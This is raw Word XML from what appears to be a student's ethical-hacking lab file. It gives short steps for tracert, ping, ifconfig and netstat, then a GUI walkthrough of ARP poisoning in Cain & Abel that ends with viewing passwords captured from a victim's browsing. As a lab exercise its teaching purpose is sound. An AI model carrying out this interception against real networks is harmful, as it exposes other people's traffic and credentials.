        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t>TraceRoute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D03C4" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step 1: Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> command and type </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidRPr="00D4195F">
          <w:rPr>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t xml:space="preserve">www.prestashop.com </w:t>
        </w:r>
        <w:r w:rsidRPr="00D4195F">
          <w:t>pr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D4195F">
        <w:t>ess “Enter”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120870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166037</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5933483" cy="4469130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483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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="006966BD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>: Ping all the IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25120972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577796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5931209" cy="5836158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09" cy="5836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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6057900" cy="2962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75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5467350" cy="4248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00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD1B6A" w:rsidRPr="00D4195F" w:rsidRDefault="00DD1B6A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.2) Perform ARP Poisoning in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:after="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="220"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="449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2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68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75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Select sniffer on the top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520217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162265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="451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68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5B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Next to folder icon click on icon name start/stop sniffer. Select device and click on ok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202278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166032</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2916407" cy="3647884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="453" name="image2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22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407" cy="3647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  <w:spacing w:before="220"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>4 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on “+” icon on the top. Click on ok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202380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152605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1925195" cy="3202305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="455" name="image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22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19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  <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId35"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="620" w:right="1040" w:bottom="1060" w:left="1220" w:header="0" w:footer="73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D2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Shows the Connected host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202483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5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="457" name="image2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2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  <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Select Arp at bottom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202585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162574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="459" name="image2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2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68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  <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId38"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1280" w:left="1220" w:header="0" w:footer="109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D2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP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 w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>7 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on “+” icon at the top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202688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5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="461" name="image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23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  <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on start/stop ARP icon on top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202790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162574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="463" name="image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23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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId40"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1060" w:left="1220" w:header="0" w:footer="86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D2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>9 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Poisoning the source.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202892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5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="465" name="image2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23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  <w:spacing w:before="210"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>10 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to any website on source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25202995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162574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5923788" cy="3189732"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="467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23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88" cy="3189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  <w:spacing w:line="289" w:lineRule="exact"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:line="289" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId43"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="280" w:left="1220" w:header="0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D2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>11 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to password option in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>abel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> and see the visited site password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25203097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156485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="469" name="image2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233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D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F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5B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="005B6F48">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
